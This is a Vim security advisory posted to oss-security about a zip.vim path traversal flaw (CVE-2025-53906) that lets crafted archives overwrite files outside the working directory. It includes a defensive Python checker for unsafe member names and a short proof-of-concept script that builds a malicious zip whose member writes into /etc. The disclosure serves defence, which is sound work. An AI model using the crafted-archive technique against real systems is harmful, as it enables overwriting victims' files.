Message-ID: <aHa8rOZSxkihIukN@256bit.org>
Date: Tue, 15 Jul 2025 22:40:12 +0200
From: Christian Brabandt <cb@...bit.org>
To: oss-security@...ts.openwall.com,
	Yee Cheng Chin <ychin.macvim@...il.com>,
	"T.J. Townsend" <tj@...k.me>, Ken Takata <ktakata65536@...il.com>,
	Jiaqi Zhou <zeertzjq@...look.com>,
	Dominique Pelle <dominique.pelle@...il.com>, mattn.jp@...il.com,
	sthen@...nbsd.org, adamw@...ebsd.org,
	James McCoy <jamessan@...essan.com>,
	Yegappan Lakshmanan <yegappanl@...il.com>,
	Doug Kearns <dougkearns@...il.com>, glepnir <glephunter@...il.com>,
	Hirohito Higashi <h.east.727@...il.com>
Subject: [vim-security]: path traversal issue with zip.vim and special
 crafted zip archives in Vim < v9.1.1551

path traversal issue with zip.vim and special crafted zip archives in Vim < v9.1.1551
=====================================================================================
Date: 15.07.2025
Severity: Low
CVE: CVE-2025-53906
CWE: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)

### Summary
A path traversal issue in Vim’s zip.vim plugin can allow overwriting of
arbitrary files when opening specially crafted zip archives.

### Description
Vim includes the zip.vim plugin, which enables viewing and editing of files
within zip archives.

An attacker can create a zip archive that contains member files with relative
paths (e.g., ../../somefile). If such an archive is opened in Vim, and the user
saves one of these malicious files, Vim may overwrite files outside the
intended working directory.

Exploitation requires several conditions:
- The user opens a specially crafted archive in Vim.
- The user selects and attempts to edit one of the files within the archive.
- Vim writes the file back to disk using :w!.

Only after all these steps are performed would Vim overwrite an existing file
on disk.

**Note**:
- Vim does display the full path to be written, so a careful user may notice
  suspicious behavior.
- Standard zip utilities typically do not extract such paths and will warn
  about or skip them. This issue only affects Vim's internal handling, not
  the zip tool itself.
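As an added defensive counterpart to the description above (example code written for this page, not part of the original advisory and not Vim's or zip.vim's own code), the following Python script lists the members of an archive whose names would resolve outside the extraction root, the same property that zip.vim failed to check. The archive it scans is constructed inline, and the function names `is_unsafe_member`, `unsafe_members` and `build_sample_archive` are my own.

```python
import io
import zipfile
from typing import List


def is_unsafe_member(name: str) -> bool:
    """Return True if a zip member name could escape the extraction root.

    Flags absolute paths (POSIX or Windows drive), backslash separators and
    any '..' component that climbs above the root after normalisation.
    """
    # Treat '\' as a separator too: some archivers emit it and a consumer
    # on Windows would honour it.
    norm = name.replace("\\", "/")
    if norm.startswith("/"):
        return True
    # Conservative drive-letter check (C:/..., D:...); a benign name such as
    # 'a:b' is also flagged, which is the safe direction to err in.
    if len(norm) >= 2 and norm[1] == ":":
        return True
    # Walk the components tracking depth; a '..' that would go below the
    # root escapes, while 'docs/../notes.txt' stays inside and is allowed.
    depth = 0
    for part in norm.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def unsafe_members(zip_bytes: bytes) -> List[str]:
    """Return the member names in the archive that is_unsafe_member flags."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [info.filename for info in zf.infolist()
                if is_unsafe_member(info.filename)]


def build_sample_archive() -> bytes:
    """Constructed sample archive mixing benign and traversal-style names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign\n")
        zf.writestr("docs/../notes.txt", "resolves to notes.txt, inside root\n")
        zf.writestr("../../../../etc/ax-pwn", "climbs out of the root\n")
        zf.writestr("/etc/ax-pwn", "absolute path\n")
    return buf.getvalue()


if __name__ == "__main__":
    for member in unsafe_members(build_sample_archive()):
        print("unsafe member:", member)
```

A plain substring search for `..` would also reject `docs/../notes.txt`, which never leaves the root; the depth walk above only rejects names that actually climb past it, while still treating absolute paths and backslashes as unsafe.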


### Proof of Concept
As a Proof of Concept, the following code crafts a malicious archive:
```python
import zipfile

zip_path = 'evil.zip'
fname = 'file'
# Member name using a relative path that climbs out of the working directory
arcname = '../../../../etc/ax-pwn'

# Create the local file whose contents are stored in the archive
with open(fname, 'w') as f:
    f.write("pwned\n")

# Store the file under the traversal member name
with zipfile.ZipFile(zip_path, 'w') as zipf:
    zipf.write(fname, arcname)
print(f"Created {zip_path}")
```
If the file contained in the evil.zip archive is edited through Vim, typing
':w' to save it will create /etc/ax-pwn on the host filesystem (provided that
the user has sufficient permissions to write into the /etc directory).

### Impact
Impact is **low** because this exploit requires direct user interaction.

However, successful exploitation can lead to overwriting sensitive files or
placing executable code in privileged locations, depending on the permissions
of the process editing the archive.

The victim must edit such a file using Vim, which will reveal the filename
and the file content; a careful user may suspect that something strange is
going on. Successful exploitation could result in the ability to execute
arbitrary commands on the underlying operating system.

The Vim project would like to thank @ax for reporting this issue.

The issue has been fixed as of Vim patch v9.1.1551.

[Commit](https://github.com/vim/vim/commit/586294a04179d855c3d1d4ee5ea83931963680b8)
[Github Advisory](https://github.com/vim/vim/security/advisories/GHSA-r2fw-9cw4-mj86)


Kind regards
Christian
-- 
We seek the truth, but we only want to find it where it suits us.
		-- Marie von Ebner-Eschenbach
